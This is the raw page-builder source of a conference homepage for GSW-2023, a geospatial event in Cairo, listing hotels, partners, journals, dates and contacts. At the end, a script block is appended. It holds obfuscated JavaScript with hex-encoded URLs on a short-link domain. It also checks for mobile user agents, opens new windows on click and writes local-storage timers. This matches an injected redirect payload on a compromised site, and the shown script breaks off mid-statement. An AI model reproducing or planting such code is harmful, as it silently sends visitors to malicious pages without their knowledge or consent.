border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 